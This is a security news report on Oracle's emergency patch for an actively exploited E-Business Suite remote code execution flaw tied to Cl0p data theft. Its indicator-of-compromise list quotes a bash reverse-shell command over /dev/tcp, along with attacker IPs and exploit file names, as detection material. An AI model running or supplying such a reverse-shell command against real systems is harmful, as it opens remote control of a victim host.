Oracle has released an emergency patch to address a serious security vulnerability in its E-Business Suite. The flaw, identified as CVE-2025-61882 with a CVSS score of 9.8, has already been actively exploited in data theft campaigns carried out by the Cl0p ransomware group.
Details of the Vulnerability
The issue lies in the Oracle Concurrent Processing component. According to Oracle, attackers can exploit the bug remotely without authentication. This means that anyone with network access over HTTP could potentially execute remote code and gain full control of affected systems.
Oracle’s advisory highlighted, “This vulnerability is remotely exploitable without authentication, meaning it may be exploited over a network without the need for a username and password. If successfully exploited, it may result in remote code execution.”
Rob Duhart, Oracle’s Chief Security Officer, confirmed that the patch also addresses additional potential exploitation paths uncovered during Oracle’s internal investigation.
Indicators of Compromise (IoCs)
Oracle shared IoCs that suggest links to the Scattered LAPSUS$ Hunters group, alongside Cl0p’s involvement. These include suspicious IP addresses and exploit artifacts:
- 200.107.207[.]26 (Observed GET and POST activity)
- 185.181.60[.]11 (Observed GET and POST activity)
- Command:
sh -c /bin/bash -i >& /dev/tcp// 0>&1(Outbound TCP connection attempt) - Files:
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- exp.py, server.py (from exploit toolkit)
Connection to Cl0p Campaigns
The emergence of this zero-day comes shortly after reports of a new Cl0p campaign against Oracle E-Business Suite. According to Mandiant, a Google-owned cybersecurity company, attackers launched a large-scale phishing campaign using hundreds of compromised email accounts.
Charles Carmakal, CTO at Mandiant, stated, “Cl0p exploited multiple vulnerabilities in Oracle EBS, including CVE-2025-61882, enabling them to steal significant volumes of data from multiple victims in August 2025.” He further warned that both zero-day and n-day exploitation are likely to continue, urging organizations to investigate whether their systems were already compromised before applying patches.
(This is a developing story. Please check back for more details.)
